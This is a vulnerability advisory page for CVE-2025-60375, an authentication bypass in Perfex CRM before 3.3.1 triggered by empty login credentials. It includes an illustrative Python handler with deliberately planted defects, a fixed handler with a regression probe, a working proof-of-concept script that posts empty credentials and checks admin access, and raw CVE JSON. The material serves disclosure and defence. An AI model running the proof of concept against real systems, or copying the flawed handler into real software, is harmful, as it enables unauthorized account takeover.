Security Vulnerability Report
CVE-2025-60375 CVSS 7.3 HIGH

CVE-2025-60375

Published: 2025-10-09 21:15:39
Last Modified: 2026-04-15 00:35:42

Description

The authentication mechanism in Perfex CRM before 3.3.1 allows attackers to bypass login credentials due to insufficient server-side validation. By sending empty username and password parameters in the login request, an attacker can gain unauthorized access to user accounts, including administrative accounts, without providing valid credentials.
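The advisory names the bug class (CWE-289, authentication bypass) but not the code path, so the following is an added illustrative model, not Perfex CRM's implementation: a login handler with two hypothetical defects that together turn empty credentials into a session (an empty lookup filter that matches the first row, and a password check that is skipped when no password was sent), next to a hardened handler that rejects empty input before any lookup and always runs the verifier. The accounts, passwords and reduced PBKDF2 round count are constructed for the example.

```python
import hashlib
import hmac
import os
import secrets

# Reduced so the example runs quickly; a real deployment uses far more rounds.
PBKDF2_ROUNDS = 10_000


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def make_user(password: str, role: str) -> dict:
    salt = os.urandom(16)
    return {"salt": salt, "hash": hash_password(password, salt), "role": role}


# Constructed sample accounts (not real data). Insertion order mirrors a typical
# install, where the administrator row is the first one created.
USERS = {
    "admin@example.test": make_user("Adm1n-Pass!", "admin"),
    "staff@example.test": make_user("St4ff-Pass!", "staff"),
}
# Dummy record so a lookup miss still costs exactly one hash computation.
_DUMMY = make_user(secrets.token_urlsafe(16), "none")


def find_user_vulnerable(email: str):
    # Hypothetical defect 1: an empty filter value is treated as "no filter",
    # so the lookup returns the first row instead of matching nothing.
    if email == "":
        return next(iter(USERS.values()))
    return USERS.get(email)


def login_vulnerable(email: str, password: str):
    """Models the advisory's bug class: empty credentials yield a session."""
    user = find_user_vulnerable(email)
    if user is None:
        return None
    # Hypothetical defect 2: the hash comparison only runs when a password
    # was actually supplied, so an empty password skips verification.
    if password and not hmac.compare_digest(
        hash_password(password, user["salt"]), user["hash"]
    ):
        return None
    return {"email": email, "role": user["role"], "session": secrets.token_hex(16)}


def login_fixed(email: str, password: str):
    """Rejects empty input before any lookup and always runs the verifier."""
    if not email or not password:
        return None
    user = USERS.get(email)
    # Verify against a dummy record on a miss so timing does not reveal
    # whether the e-mail exists; the result is discarded in that case.
    record = user if user is not None else _DUMMY
    ok = hmac.compare_digest(hash_password(password, record["salt"]), record["hash"])
    if user is None or not ok:
        return None
    return {"email": email, "role": user["role"], "session": secrets.token_hex(16)}


def accepts_empty_credentials(login) -> bool:
    """Regression probe: True if the handler issues a session for ("", "")."""
    return login("", "") is not None


if __name__ == "__main__":
    print("vulnerable handler accepts empty credentials:",
          accepts_empty_credentials(login_vulnerable))
    print("fixed handler accepts empty credentials:",
          accepts_empty_credentials(login_fixed))
```

The probe is the check worth keeping in a test suite: any login handler for which `accepts_empty_credentials` returns True has the defect the advisory describes, whatever the underlying cause.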

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Note that this vector rates confidentiality, integrity and availability impact as Low, which understates an unauthenticated bypass that the description says reaches administrative accounts; triage it as an account-takeover issue regardless of the 7.3 score.

Configurations (Affected Products)

No CPE configuration data is published for this record; the affected range below is taken from the description.

Perfex CRM < 3.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60375 - Perfex CRM Authentication Bypass PoC
# This PoC demonstrates the authentication bypass vulnerability
# by sending empty username and password parameters to the login endpoint
import requests

# Target configuration
TARGET_URL = "http://target-perfex-crm.com"
LOGIN_ENDPOINT = "/authentication/login"

# Step 1: Prepare the malicious login request with empty credentials
login_url = TARGET_URL + LOGIN_ENDPOINT

# Empty username and password parameters
payload = {
    "email": "",
    "password": "",
}

# Step 2: Send the authentication bypass request
session = requests.Session()
response = session.post(login_url, data=payload, allow_redirects=False, timeout=10)

# Step 3: Check whether the login was not rejected.
# A 302 on its own is only an indicator: a rejected login also redirects,
# so the real confirmation is the protected-page check in step 4.
location = response.headers.get("Location", "")
if response.status_code == 302 or "dashboard" in location:
    print(f"[*] Login request redirected to: {location!r}")
    print(f"[*] Session cookies: {session.cookies.get_dict()}")

    # Step 4: Access a protected resource using the obtained session.
    # allow_redirects=False so a bounce back to the login form (which would
    # itself render with 200) is not mistaken for access to the dashboard.
    dashboard_url = TARGET_URL + "/admin"
    dashboard_response = session.get(dashboard_url, allow_redirects=False, timeout=10)
    if dashboard_response.status_code == 200:
        print("[+] Successfully accessed admin dashboard!")
        print("[+] Vulnerability confirmed - CVE-2025-60375")
    else:
        print(f"[-] Protected page not reachable (status {dashboard_response.status_code}); bypass not confirmed")
else:
    print("[-] Authentication bypass failed")
    print(f"[-] Response status: {response.status_code}")

References

https://github.com/AhamedYaseen03/CVE-2025-60375

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60375", "sourceIdentifier": "[email protected]", "published": "2025-10-09T21:15:39.323", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The authentication mechanism in Perfex CRM before 3.3.1 allows attackers to bypass login credentials due to insufficient server-side validation. By sending empty username and password parameters in the login request, an attacker can gain unauthorized access to user accounts, including administrative accounts, without providing valid credentials."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-289"}]}], "references": [{"url": "https://github.com/AhamedYaseen03/CVE-2025-60375", "source": "[email protected]"}]}}